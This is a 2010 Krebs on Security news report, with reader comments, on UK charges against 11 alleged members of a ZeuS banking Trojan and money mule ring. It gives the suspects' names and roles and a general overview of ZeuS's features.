Krebs on Security

In-depth security news and investigation

11 Charged In ZeuS & Money Mule Ring

Authorities in the United Kingdom on Wednesday charged 11 individuals with running an international cybercrime syndicate that laundered millions of dollars stolen from consumers and businesses with the help of the help of the ultra-sophisticated ZeuS banking Trojan.

The gang is believed to be responsible for stealing more than $30 million from banks worldwide between October 2009 and September 28, 2010, and roughly £6 million (US$9.5 million) from financial institutions in the United Kingdom over a three-month period.

Karina Kostromina, in undated photo.

According to sources close to the case, members of the group also were heavily involved in online banking thefts perpetrated against dozens of small businesses and organizations based in the United States. Eight gang members were charged with money laundering, and 10 were charged with conspiracy to defraud. Police arrested 20 people in a pre-dawn raid on Tuesday; nine were bailed on Wednesday. The Metropolitan Police’s Central e-Crime Unit said those individuals may face charges at a later date. Those charged were due to appear in Westminster Magistrates’ Court court early this morning.

The individuals arrested in the U.K. are thought to be a subset of a global cybercrime operation. The Wall Street Journal now reports that the U.S. Attorney’s office in Manhattan is preparing to announce that 60 people have been charged in connection with a major ZeuS crime ring.

Sources say the ringleader of the U.K. gang, 32-year-old Ukrainian property developer Yevhen Kulibaba (pictured above right), shuttled some of the stolen funds from the U.K. to Ukraine and to Latvia, where he has been building a home with his wife. Information obtained by KrebsOnSecurity indicates that Kulibaba’s wife may be Karina Kostromina (pictured above left), a 33-year-old Latvian woman who was among those charged with money laundering and conspiracy in connection with this case. The U.K. Metropolitan Police declined to confirm or deny whether Kulibaba and Kostromina were married, although their public statement puts the two in the same neighborhood – Nevada Heights, Chingford, Essex.

Yuriy Konovalenko

Kulibaba’s right-hand man, 28-year-old Yuriy Konovalenko — also of Nevada Heights — is described by the e-Crime Unit as a self-employed Web designer from Ukraine. Sources say Konovalenko was chiefly responsible for managing a large number of “money mules,” people hired to withdraw, carry or transmit cash stolen by the gang. A review of Konovalenko’s social networking site identities suggests he is a blood relative of Kulibaba’s, but U.K. police declined to confirm or deny this information.

Also charged with conspiracy and stealing money from online bank accounts is Milka Valerij (pictured below), a 29-year-old Ukrainian whom U.K. police say was a building laborer.

Milka Valerij

The oldest alleged member of the group — 34 year-old Georgian Zurab Revazishvili — is facing violations of the U.K. Identity Cards Act of 2005, which makes it a crime to possess false identity documents. The Metropolitan Police statement on the crimes doesn’t specify what Revazishvili’s role was, but sources say he may have been responsible for creating false identity documents for the gang’s money mules.

ZeuS is a commercial crimeware kit sold for a few thousand dollars per copy in underground online forums. It is primarily designed to steal sensitive financial data stored on victim computers or transmitted through victim Web browsers. ZeuS’s most advanced features allow criminals to inject content into a bank’s Web page as it is displayed in the victim’s browser in real time, take screen shots from infected PCs, and quietly redirect victims from banking Web sites to counterfeit versions set up by the attackers. ZeuS is set up so that stolen data is sent to a “drop server” controlled by the attacker, and it allows miscreants to control the infected systems remotely. Check out this link for a more comprehensive discussion of the features built into ZeuS.

Currently, there are at least 160 unique ZeuS control networks online worldwide, according to Zeus Tracker, a site that keeps tabs on the number and geographic distribution of unique ZeuS botnets.

Andy Fried, owner of Deteque, a computer security consultancy in Alexandria, Va., has been tracking ZeuS related activity and spam for many months. Fried said that while rounding up those who are buying and deploying ZeuS botnets is important, going after the money mule infrastructure is the best way to ensure that the stolen data can’t be used.

“These ZeuS operations are a pipeline, and the money mules are a very important part of that,” Fried said. “[Online banking] credentials have intrinsic value, but it’s not until you’re able to utilize that information — and that’s where the money mules come in — that those credentials have real value. That’s why choking off the money mule network will probably have the best short-term detrimental effect against ZeuS.”

This entry was posted on Thursday, September 30th, 2010 at 11:13 am and is filed under A Little Sunshine, Target: Small Businesses.
You can follow any comments to this entry through the RSS 2.0 feed.
Both comments and pings are currently closed.

Brian, thank you once again for a very interesting article! I find it astonishing that this gang was supposedly operating from the UK – the Ukraine should currently be more of a safe haven for them. Unless they are only the part of the organization that the prosecutors could get.

Btw, I think you got the name wrong for one of the guys – I am pretty sure that Valerij is his first name (yes, it appears the same in other articles as well so maybe the police published it like that).

Thanks, Wladimir. I think you’re right about Valerij’s name: There are multiple misspellings of peoples’ names in the UK press release about this. I corrected one of them in my story, which you will see names Yuriy KoNovalenko, while the UK press release says KoRovalenko.

Also, I am not sure, but I believe Kulibaba’s first name is actually Yevgheniy.

I found a few other posts regarding the arrest of the 19, the 11 charged and the 60 being charged by the US on a blog by Graham Cluley (Sophos). He said that according to the media reports the charges by the US Attorney is related to the arrests in London. If he’s right, and those in the US are mostly the money mules then looks like we’re taking Fried’s advice and actually going after both sides of the issue instead of just one.

What I found is at the link below – it merges in with all his other posts so sometimes you have to scroll through to find the related ones.http://www.sophos.com/blogs/gc/

I think this is great news! Finally action is being taken and it’s not just one or two people… If there is more action taken against this kind of behavior then I think people will think twice before doing it. Will it stop it completely, no – but it can still make a big difference if we continue to fight back. Perhaps those hired as mules will think about it and be more cautious before getting pulled into the scam… that would definately make it more difficult for the people behind it. Plus, they’d have to worry more about being caught too. Will be interesting to see how things play out.

Hallelujah! Great news to hear some cyber thieves are getting caught. As usual, another excellent job of reporting cyber crime. You’ve done an outstanding job in raising awareness on the cyber crime issue and the damaging affects of the Zeus toolkit. I see your name in several articles and white papers on Trojans and man-in-the-middle attacks. You’re famous!

It would seem odd that someone whose business is web design would have no domains registered in his own name, but DomainTools is coming up with zero for all combinations of Yuri/Yuriy/Yurij and Konovalenko/Korovalenko. Could his name be Kovalenko?

It just seems that even someone with so much involvement in illegal activity would have some personal domain name registrations, too. But perhaps with less internet penetrance in Eastern Europe, there would have been less likelihood of a friend or relative asking him to set up a legitimate site for their family or business.